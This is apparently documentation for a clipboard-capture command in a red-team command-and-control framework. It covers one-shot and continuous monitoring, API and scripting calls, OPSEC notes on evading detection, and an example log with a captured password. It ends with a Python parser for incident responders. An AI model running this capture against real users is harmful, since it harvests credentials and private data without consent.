
Clipboard Monitor

Capture and monitor the Windows clipboard. Supports one-shot reads and continuous change monitoring with configurable poll intervals.

MITRE ATT&CK

Clipboard monitoring maps to T1115 - Clipboard Data.


Commands

| Command | Syntax | Description |
|---|---|---|
| clipboard | clipboard | One-shot read of current clipboard contents |
| clipboard start | clipboard start [interval_ms] | Start continuous clipboard monitoring |
| clipboard stop | clipboard stop | Stop continuous monitoring |

One-Shot Read

clipboard

Read the current clipboard contents (text only, CF_UNICODETEXT format). Returns the current text, or "(clipboard empty or not text)" if the clipboard is empty or contains non-text data.

Shell syntax:

clipboard

API example:

curl -s -X POST "https://stentor.app/api/v1/cockpit/beacons/$BEACON_ID/shell" \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"command": "clipboard"}'

CNA scripting:

bclipboard($bid);

Continuous Monitoring

clipboard start [interval_ms]

Start a background clipboard monitor that polls for changes at a configurable interval. When new text is detected, it is timestamped and appended to an output file in %TEMP%.

| Parameter | Type | Required | Default | Description |
|---|---|---|---|---|
| interval_ms | int | No | 1000 | Poll interval in milliseconds |

Shell syntax:

clipboard start
clipboard start 500

API example:

curl -s -X POST "https://stentor.app/api/v1/cockpit/beacons/$BEACON_ID/shell" \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"command": "clipboard start 500"}'

Example output:

Clipboard monitor started, interval=500ms, output=C:\Users\labuser\AppData\Local\Temp\clipboard_20260219_143022.txt

The output file contains timestamped entries only when the clipboard content changes:

--- Clipboard monitor started at 2026-02-19T14:30:22Z ---
[2026-02-19T14:30:23Z] Password123!
[2026-02-19T14:31:45Z] \\DC01\SYSVOL\corp.local
[2026-02-19T14:32:10Z] SELECT * FROM users WHERE admin=1
--- Clipboard monitor stopped at 2026-02-19T14:35:00Z ---

clipboard stop

Stop the background clipboard monitor.

Shell syntax:

clipboard stop

How It Works

  1. One-shot (get): Opens the clipboard via OpenClipboard(), retrieves the text handle with GetClipboardData(CF_UNICODETEXT), reads the UTF-16 data under GlobalLock/GlobalUnlock and converts it to a Go string, then closes the clipboard
  2. Continuous (start): Spawns a goroutine that polls the clipboard at the configured interval. Only records entries when the content changes (change detection). Writes timestamped entries to an output file in %TEMP%
  3. Stop: Closes the stop channel, terminating the polling goroutine. The output file is finalized with an end timestamp

OPSEC Considerations

  • Calls OpenClipboard / GetClipboardData from user32.dll -- these API calls from unusual processes may be flagged
  • Continuous monitoring creates a file on disk in %TEMP% with clipboard contents
  • No new process creation -- all clipboard access happens inline in the beacon process
  • Change detection avoids excessive writes (only logs when content differs from last poll)
  • MITRE ATT&CK: T1115 (Clipboard Data)
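
For incident responders, the %TEMP% output file described above is a parseable artifact. The following Python is an added example, not Stentor's own code: it rebuilds capture sessions from the file format shown earlier and reports sessions that have no stop footer. The file-name pattern is inferred from the single example path on this page, and treating unprefixed lines as continuations of multi-line clipboard text is an assumption.

```python
import re
from datetime import datetime

# File-name shape inferred from the one example path on this page (assumption).
ARTIFACT_NAME = re.compile(r"^clipboard_\d{8}_\d{6}\.txt$", re.IGNORECASE)
START = re.compile(r"^--- Clipboard monitor started at (\S+) ---$")
STOP = re.compile(r"^--- Clipboard monitor stopped at (\S+) ---$")
ENTRY = re.compile(r"^\[(\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}Z)\] (.*)$")

def _ts(value):
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ")

def is_artifact_name(path):
    """True if the file name (Windows or POSIX path) matches the output naming."""
    return bool(ARTIFACT_NAME.match(re.split(r"[\\/]", path)[-1]))

def parse_artifact(text):
    """Return capture sessions: start/stop times and the captured entries."""
    sessions, current = [], None
    for line in text.splitlines():
        if m := START.match(line):
            current = {"start": _ts(m.group(1)), "stop": None, "entries": []}
            sessions.append(current)
        elif current is None:
            continue  # text outside any session header is ignored
        elif m := STOP.match(line):
            current["stop"] = _ts(m.group(1))
            current = None
        elif m := ENTRY.match(line):
            current["entries"].append([_ts(m.group(1)), m.group(2)])
        elif current["entries"]:
            # Assumption: multi-line clipboard text continues on unprefixed lines.
            current["entries"][-1][1] += "\n" + line
    return sessions

# Constructed sample in the format shown above; the second session has no stop footer.
SAMPLE = """--- Clipboard monitor started at 2026-02-19T14:30:22Z ---
[2026-02-19T14:30:23Z] first copied line
second copied line
[2026-02-19T14:31:45Z] \\\\FILESRV\\share
--- Clipboard monitor stopped at 2026-02-19T14:35:00Z ---
--- Clipboard monitor started at 2026-02-19T15:00:00Z ---
[2026-02-19T15:00:05Z] example text
"""

if __name__ == "__main__":
    for s in parse_artifact(SAMPLE):
        print(s["start"], "->", s["stop"] or "no stop footer", "|", len(s["entries"]), "entries")
```

A session whose "stop" is None had no footer written, so its last entry timestamp is only a lower bound on how long capture ran.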